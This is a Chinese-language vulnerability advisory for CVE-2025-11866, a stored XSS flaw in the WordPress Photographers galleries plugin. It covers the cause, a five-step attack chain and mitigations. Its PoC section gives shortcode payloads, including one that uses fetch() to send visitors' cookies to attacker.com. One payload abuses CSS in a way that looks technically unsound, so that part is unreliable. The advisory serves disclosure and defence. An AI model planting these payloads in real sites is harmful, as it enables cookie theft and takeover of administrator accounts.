CVE-2025-11866：WordPress Photographers galleries插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11866

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Photographers galleries plugin

漏洞概述

CVE-2025-11866是WordPress插件Photographers galleries中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由Wordfence安全团队的安全研究员发现，并于2025年10月22日公开披露。CVSS 3.1评分为6.4分，属于中危级别。

Photographers galleries是一款用于WordPress网站的相册画廊展示插件，允许用户创建和管理摄影作品展示。该插件通过短代码（shortcode）的方式在文章或页面中嵌入画廊功能，提供了丰富的自定义属性以控制画廊的外观和行为。

该漏洞存在于插件的所有1.1.8及以下版本中。漏洞的根本原因在于插件未能对用户通过短代码属性（如w、h、raw_css、look等）传入的数据进行充分的输入过滤和输出转义处理。当这些未经净化的用户输入被插入到HTML属性或内联样式中时，攻击者可以注入恶意的JavaScript代码。由于这些恶意脚本被持久化存储在WordPress数据库中，任何访问受影响页面的用户都会触发脚本执行，从而实现窃取会话Cookie、劫持用户账户、篡改页面内容或执行其他恶意操作。

该漏洞需要攻击者至少拥有Contributor（投稿者）级别的WordPress账户权限才能利用，这限制了其直接利用的范围。然而，在多用户WordPress网站（如企业网站、教育平台或社区论坛）中，投稿者权限相对容易获取，或者攻击者可能通过社会工程学手段获取低权限账户，因此该漏洞仍然具有较高的实际威胁。

技术细节

该漏洞的核心技术原理是插件对短代码属性的处理缺乏安全防护。具体技术细节如下：

1. **输入验证缺失**：插件的shortcodes.php文件中（第61行附近），多个短代码属性（包括w、h、raw_css、look等）直接接收用户输入而未进行任何过滤或转义处理。这些属性本应用于配置画廊的宽度、高度、自定义CSS和外观样式等。

2. **输出转义缺失**：当插件将这些属性值渲染到HTML页面时，没有使用WordPress提供的转义函数（如esc_attr()、esc_html()、esc_url()等）进行适当的输出转义。特别是当属性值被插入到内联style属性或事件处理器属性中时，攻击者可以闭合现有属性并注入新的恶意属性。

3. **存储型XSS机制**：由于短代码内容被存储在WordPress数据库的文章内容中，恶意脚本也会被持久化保存。每当普通用户访问包含恶意短代码的文章或页面时，嵌入的JavaScript代码将在用户的浏览器上下文中自动执行。

4. **利用方式**：攻击者首先获取Contributor或更高权限的WordPress账户，然后创建一篇新文章或页面，在内容中插入类似以下的恶意短代码：
`[gallery w="100\" onmouseover=\"alert(document.cookie)\"" h="100"]`
或者通过raw_css属性注入更复杂的payload。

5. **影响范围**：由于脚本在所有访问者的浏览器中执行，攻击者可以窃取管理员的会话Cookie（如果管理员访问了该页面），进而完全控制网站。此外，攻击者还可以进行钓鱼攻击、恶意重定向、植入恶意软件等。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者通过注册新账户、社会工程学或购买凭证等方式，获取目标WordPress网站的Contributor（投稿者）级别或更高权限的账户。

STEP 2

步骤2：构造恶意短代码

攻击者创建一篇新文章或页面，在内容中插入包含恶意JavaScript代码的Photographers galleries短代码，利用w、h、raw_css、look等未净化的属性注入XSS payload。

STEP 3

步骤3：提交并发布内容

攻击者提交文章等待审核，或在具有更高权限时直接发布。恶意短代码内容被持久化存储到WordPress数据库中。

STEP 4

步骤4：触发恶意脚本执行

当任何用户（包括管理员）访问包含恶意短代码的页面时，浏览器解析HTML并执行注入的JavaScript代码，脚本在受害者浏览器上下文中运行。

STEP 5

步骤5：执行恶意操作

注入的脚本可以窃取用户的会话Cookie、劫持账户权限、进行钓鱼攻击、植入后门、篡改页面内容或将受害者重定向到恶意网站，实现进一步的攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-11866 Stored XSS PoC -->
<!-- Exploits insufficient sanitization in shortcode attributes (w, h, raw_css, look, etc.) -->

<!-- PoC 1: Inject via 'w' attribute to break out of HTML attribute and execute JS -->
[photogallery w="100\" onmouseover=\"alert('XSS-'+document.cookie)\"" h="100"]

<!-- PoC 2: Inject via 'raw_css' attribute to inject event handler in inline style -->
[photogallery raw_css="; } body{ } img{src=x onerror=alert(document.domain); } /*" look="default"]

<!-- PoC 3: Steal admin cookie via fetch to attacker-controlled server -->
[photogallery w="\" style=\"background:url(javascript:fetch('https://attacker.com/steal?c='+document.cookie))\"" h="\""]

<!-- Full exploitation flow:
     1. Attacker logs in as Contributor
     2. Creates a new post containing the malicious shortcode above
     3. Submits post for review (or publishes if Author+)
     4. Admin/Editor reviews and publishes the post
     5. Any visitor loading the page triggers the injected JavaScript
     6. Attacker receives stolen cookies or performs actions as the victim
-->

影响范围

Photographers galleries plugin <= 1.1.8

防御指南

临时缓解措施

在无法立即升级插件的情况下，建议采取以下临时缓解措施：1）暂时停用Photographers galleries插件；2）使用Wordfence等安全插件配置WAF规则，阻止包含可疑短代码属性注入模式的请求；3）限制Contributor级别用户提交内容的能力，要求所有投稿必须经过严格审核；4）在Web服务器层面配置Content Security Policy（CSP），限制内联脚本的执行；5）监控网站访问日志和数据库变更，及时发现可疑活动；6）检查已发布内容中是否已存在恶意注入，并清理受感染的文章。